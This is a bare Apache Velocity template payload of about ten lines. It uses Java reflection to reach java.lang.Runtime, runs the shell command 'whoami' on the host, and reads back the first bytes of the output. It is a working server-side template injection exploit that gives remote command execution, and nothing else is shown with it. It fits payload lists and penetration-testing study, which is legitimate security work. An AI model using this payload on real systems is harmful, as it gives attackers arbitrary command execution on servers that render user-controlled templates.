#set ($exp="exp")
#set ($str=$exp.getClass().forName("java.lang.String"))
#set ($chr=$exp.getClass().forName("java.lang.Character"))
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("whoami"))
#set ($out=$a.getInputStream())

#set ($result="")
#foreach ($i in [0..10])
    $out.read()
#end
